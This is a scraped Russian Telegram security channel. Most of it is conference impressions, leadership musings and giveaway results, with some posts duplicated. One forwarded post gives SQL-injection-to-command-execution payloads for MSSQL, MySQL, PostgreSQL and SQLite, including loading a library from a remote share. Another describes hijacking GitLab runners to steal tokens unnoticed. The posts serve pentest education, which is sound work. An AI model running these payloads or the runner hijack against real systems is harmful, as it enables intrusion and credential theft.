Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍3
#конкурс
Для участия нужно:
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥19⚡6👍5
А у вас есть новогоднее настроение? Лично у меня нет, но я вот накупил подарков близким и когда подарю, буду доволен как Дед Мороз)
До Нового Года кстати осталось всего 2 недели, заметили?) Мне вот только вчера про это напомнили👩
Решил пока есть хорошее настроение, написать пару постов с итогами года для меня и канала. Посты будут поделены на части, так что можете прочитать только важное для себя)
👉 Спасибо! Первое что хотелось сказать, что Я с Вами сделал х2 рост по всем направлениям: личностно, канал, медиа, зп конечно не х2, но некий икс тоже пресутствует) Без Вас ничего бы этого не было, поэтому большущее вам спасибо! 😊
👉 Конференции. За этот год я даже не смог посчитать на скольки конференциях был, точно более 30, и это только то что я не забывал в календаре отмечать. Реальное число думаю переваливает за 40. Поэтому я считаю, что могу резюмировать свой опыт и назвать его достаточно объективным.
1. База — не все конференции интересны, полезны и стоят внимания. Но есть другая грань этой мысли — если вы только начинаете свой путь в какой-то ни было сфере, будь-то ИБ, маркетинг, предпринимательство или даже юриспруденция. Посещайте конференции в начале, как можно больше. Будьте губкой, которая впитывает все возможные знания в себя. Бесполезных знаний не бывает в начале пути. Но потом, когда вы уже стали отважной петрушкой и понимаете, что тут вы ничего нового не узнаете, знакомых нет — ходить конечно не стоит. А если допустим доклады вам не интересны, но есть шанс выбраться с коллегами из офиса - вай нот?
2. Все конференции можно четко разделить на категории, просто посмотря на доклады и участников конференции.
2.1. Бизнесовые конференции классно, если вы хотите развиваться не только как технический специалист, но и иметь подвешенный язык при общении с заказчиками. Из тех что мне понравились: КОД ИБ, ГАРДА Сохранить Всё
2.2. Комьюнити ивенты - я бы сюда отнёс OFFZONE, UnderConf, Yandex Yet Another Security Meetup, VK Security Confab и приватки: Assume Birch, Zakeq, Xakep Meetup и т.д.
2.3. Около гос конференции. Тут зачастую только для пиджаков, причем дорогих) Мне лично такие конференции не заходят, т.к. не мой профиль, но к примеру бумажным ИБ специалистам, они наверное будут полезны.
2.4. Общего назначение, т.е. b2c+b2b+b2g. Из таких, это мероприятия от PT: PHD Fest, Кибердом. Что-то среднее между всем.
3. Начало конференций с 8-10 утра. Можно конечно сказать, что я ленивая жепка и просыпаюсь поздно, но судя по невыспавшимся лицам остальных 99% людей, над этим стоить задуматься и начинать позже. Ничего страшного не будет, если компании будут делать более ёмкие программы докладов с расчётом на начало в 12 к примеру. Даже скоре это к лучшему, более концентрированные доклады улучшат имидж конференции.
4. Кейтеринг (еда). Я конференции посещаю последние лет 6 своей жизни и видел разный кейтеринг, даже пару раз его организовывал. Я понимаю специфику и проблемы этого направления, но когда крупнейшие компании не заботятся о базовой потребности своих гостей, это грустно. От меня пожелания - протестировать что-то кроме микромалекулярной кухни, которой во-первых не насытишься, во-вторых не все такое едят банально. Из очень крутого кейтеринга в Q4 отмечу Bugs Zone, ИБ Митап (были очень вкусные воки, которые готовили при гостях. Это дополнительный перформанс, сытно, не так дорого как кажется) и последний в этом году митап Яндекса, где было очень вкусное мясо и других разнообразные сытные закуски (но это уже явно дорого)).А вообще можете сказать, что я жирный и мне надо меньше есть и будете правы :D
До Нового Года кстати осталось всего 2 недели, заметили?) Мне вот только вчера про это напомнили
Решил пока есть хорошее настроение, написать пару постов с итогами года для меня и канала. Посты будут поделены на части, так что можете прочитать только важное для себя)
1. База — не все конференции интересны, полезны и стоят внимания. Но есть другая грань этой мысли — если вы только начинаете свой путь в какой-то ни было сфере, будь-то ИБ, маркетинг, предпринимательство или даже юриспруденция. Посещайте конференции в начале, как можно больше. Будьте губкой, которая впитывает все возможные знания в себя. Бесполезных знаний не бывает в начале пути. Но потом, когда вы уже стали отважной петрушкой и понимаете, что тут вы ничего нового не узнаете, знакомых нет — ходить конечно не стоит. А если допустим доклады вам не интересны, но есть шанс выбраться с коллегами из офиса - вай нот?
2. Все конференции можно четко разделить на категории, просто посмотря на доклады и участников конференции.
2.1. Бизнесовые конференции классно, если вы хотите развиваться не только как технический специалист, но и иметь подвешенный язык при общении с заказчиками. Из тех что мне понравились: КОД ИБ, ГАРДА Сохранить Всё
2.2. Комьюнити ивенты - я бы сюда отнёс OFFZONE, UnderConf, Yandex Yet Another Security Meetup, VK Security Confab и приватки: Assume Birch, Zakeq, Xakep Meetup и т.д.
2.3. Около гос конференции. Тут зачастую только для пиджаков, причем дорогих) Мне лично такие конференции не заходят, т.к. не мой профиль, но к примеру бумажным ИБ специалистам, они наверное будут полезны.
2.4. Общего назначение, т.е. b2c+b2b+b2g. Из таких, это мероприятия от PT: PHD Fest, Кибердом. Что-то среднее между всем.
3. Начало конференций с 8-10 утра. Можно конечно сказать, что я ленивая жепка и просыпаюсь поздно, но судя по невыспавшимся лицам остальных 99% людей, над этим стоить задуматься и начинать позже. Ничего страшного не будет, если компании будут делать более ёмкие программы докладов с расчётом на начало в 12 к примеру. Даже скоре это к лучшему, более концентрированные доклады улучшат имидж конференции.
4. Кейтеринг (еда). Я конференции посещаю последние лет 6 своей жизни и видел разный кейтеринг, даже пару раз его организовывал. Я понимаю специфику и проблемы этого направления, но когда крупнейшие компании не заботятся о базовой потребности своих гостей, это грустно. От меня пожелания - протестировать что-то кроме микромалекулярной кухни, которой во-первых не насытишься, во-вторых не все такое едят банально. Из очень крутого кейтеринга в Q4 отмечу Bugs Zone, ИБ Митап (были очень вкусные воки, которые готовили при гостях. Это дополнительный перформанс, сытно, не так дорого как кажется) и последний в этом году митап Яндекса, где было очень вкусное мясо и других разнообразные сытные закуски (но это уже явно дорого)).
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥26
Похек
А у вас есть новогоднее настроение? Лично у меня нет, но я вот накупил подарков близким и когда подарю, буду доволен как Дед Мороз) До Нового Года кстати осталось всего 2 недели, заметили?) Мне вот только вчера про это напомнили 👩 Решил пока есть хорошее…
Почему начал развитие вертикально? Всю жизнь был чисто задротом интровертом технарём, даже социопатичным в какой-то степени, хотя сейчас в этом сложно поверить. Решил для себя открыть новое направление развития, т.к. моя деятельность с каналом качает мои soft скиллы, а тимлидство это одно из лучших применений этих навыков.
С какими сложностями столкнулся? Я сложный по характеру человек и частенько какие-то споры воспринимаю в штыки, что плохо, но что есть. Поэтому первой стеной было принятие странности других людей, стараться понять человека и найти с ним общий язык, что пока получается.
Чем дальше в лес — тем больше дров. Как правильно мне сказал Лёша Федулаев, а ему его тимлид. Если хочешь быть большим руководителем, то учись руководить любым человеком.
Надо ли оно конкретно тебе? Не знаю
Please open Telegram to view this post
VIEW IN TELEGRAM
👍24🔥13
Похек
🎉 Результаты розыгрыша:
Победители:
1. Валерий (@valerius_r)
2. Azorik (@Azor1k)
3. Peka (@peka_boyarin)
4. Gshar (@Gshar4)
5. Ann (@AnnMax1703)
Проверить результаты
Победители:
1. Валерий (@valerius_r)
2. Azorik (@Azor1k)
3. Peka (@peka_boyarin)
4. Gshar (@Gshar4)
5. Ann (@AnnMax1703)
Проверить результаты
👾13🌚4⚡3
Похек
🎉 Результаты розыгрыша: Победители: 1. Валерий (@valerius_r) 2. Azorik (@Azor1k) 3. Peka (@peka_boyarin) 4. Gshar (@Gshar4) 5. Ann (@AnnMax1703) Проверить результаты
Отписал
Forwarded from hx0110
SQLi to RCE
На самом деле тема исполнения команд по средствам SQL инъекций сотни раз подвергалась обсуждениям, но думаю стоит собрать это все в одном месте). Техники брались в основном из статейки на medium и поста Intigriti в твитере (советую поглядеть)
Исполниться можно в контекстах разных баз данных:
1. MSSQL💻
2. MySQL😗
3. PostgreSQL💻
4. Oracle🤪
5. SQLite🤝 (не нашел emoji :))
MSSQL: наверно самая известная техника среди пентестеров (sqli to rce) - это способ исполнения в MSSQL базах данных с использованием хранимой процедуры
MySQL: в этой субд исполниться можно за счет определяемых пользователем функций (UDF). Правда для этого необходимо загрузить и зарегистрировать библиотеку или она должна быть загружена администратором, после чего можно вызывать функции из этой библиотеки. Например:
PostgreSQL: В постгресе есть несколько возможных подходов.
1 - Возможность подгрузки расширений. Можно использовать расширение по типу
2 - Загрузка функции напримую из libc например
3- Команда
ORACLE: так как oracle имеет встроенный Java движок это позволяет создавать разработчикам хранимые процедуры. Злоумышленники тоже могут этим воспользоваться для создания своей вредоносной процедуры(подробнее см. статью на медиуме)
SQLite: в sqlite можно также пойти через подгрузку расширений, но эта возможность должна быть явна включена:
или например с помощью
Если вдруг чего то не хватает, подмечайте, обязательно добавлю !)
#SQLi #RCE
На самом деле тема исполнения команд по средствам SQL инъекций сотни раз подвергалась обсуждениям, но думаю стоит собрать это все в одном месте). Техники брались в основном из статейки на medium и поста Intigriti в твитере (советую поглядеть)
Исполниться можно в контекстах разных баз данных:
1. MSSQL
2. MySQL
3. PostgreSQL
4. Oracle
5. SQLite
MSSQL: наверно самая известная техника среди пентестеров (sqli to rce) - это способ исполнения в MSSQL базах данных с использованием хранимой процедуры
xp_cmdshell. Конечно, должны присутствовать необходимые привилегии, чтобы ее включить, так как по дефолту она выключена. После этого можно выполнять команды:EXEC xp_cmdshell 'dir c:\';
MySQL: в этой субд исполниться можно за счет определяемых пользователем функций (UDF). Правда для этого необходимо загрузить и зарегистрировать библиотеку или она должна быть загружена администратором, после чего можно вызывать функции из этой библиотеки. Например:
SELECT sys_eval('whoami');PostgreSQL: В постгресе есть несколько возможных подходов.
1 - Возможность подгрузки расширений. Можно использовать расширение по типу
plpythonu для исполнения python когда прямо из SQL.-- create extension
CREATE EXTENSION IF NOT EXISTS plpythonu;
-- define the malicious function
CREATE OR REPLACE FUNCTION exec_cmd(cmd text) RETURNS void AS $$
import os
os.system(cmd)
$$ LANGUAGE plpythonu;
-- execute command
SELECT exec_cmd('whoami');
2 - Загрузка функции напримую из libc например
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('whoami');
3- Команда
PROGRAMORACLE: так как oracle имеет встроенный Java движок это позволяет создавать разработчикам хранимые процедуры. Злоумышленники тоже могут этим воспользоваться для создания своей вредоносной процедуры(подробнее см. статью на медиуме)
SQLite: в sqlite можно также пойти через подгрузку расширений, но эта возможность должна быть явна включена:
UNION SELECT 1,load_extension('\\example.com\mal_extension.so', 'MainFuncCall')или например с помощью
load_file() прочитать закрытые ключи SSH (этот подход можно применять и в других бдшках)Если вдруг чего то не хватает, подмечайте, обязательно добавлю !)
#SQLi #RCE
Please open Telegram to view this post
VIEW IN TELEGRAM
Medium
Exploiting SQL Injection for RCE: Five Techniques Across Popular Databases
بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ
🔥19👍2
Похек
Напоминаю, что этот конкурс закончится завтра!
👍9🔥4
Похек
🎉 Результаты розыгрыша:
Победители:
1. Никита (@nickmoebiusec)
2. Mikhail (@shashinma)
3. посошочек (@dbbqqp)
4. С₉H₁₈O₆
5. Maksim (@t1oximin)
Проверить результаты
Победители:
1. Никита (@nickmoebiusec)
2. Mikhail (@shashinma)
3. посошочек (@dbbqqp)
4. С₉H₁₈O₆
5. Maksim (@t1oximin)
Проверить результаты
🌚14👍1🔥1
Похек
🎉 Результаты розыгрыша: Победители: 1. Никита (@nickmoebiusec) 2. Mikhail (@shashinma) 3. посошочек (@dbbqqp) 4. С₉H₁₈O₆ 5. Maksim (@t1oximin) Проверить результаты
Отправил)
🌚12
Бывают случаи, когда вы получаете доступ к Gitlab'у в рамках пентест проекта. Но что делать кроме клона доступных репозиториев?
Если у нас есть права в рамках gitlab или репозитория, вы можете зарегистрировать gitlab runner и сделать hijack в репозиторий, куда запулят во время работы скрипта. Дальше вы получите в grabbed_data.json с токенами. Большим плюсом является то, что джоба не падает, что позволяет не привлекать не нужное внимание разработчика или тем более appsec/devsecops. Безуслоно техника не новая, но полезно о ней помнить)
⭐️ Github
💎 Cheatsheet от snovvcrash
⭐️ Ресерч от индуса
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Если у нас есть права в рамках gitlab или репозитория, вы можете зарегистрировать gitlab runner и сделать hijack в репозиторий, куда запулят во время работы скрипта. Дальше вы получите в grabbed_data.json с токенами. Большим плюсом является то, что джоба не падает, что позволяет не привлекать не нужное внимание разработчика или тем более appsec/devsecops. Безуслоно техника не новая, но полезно о ней помнить)
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍11🌚2⚡1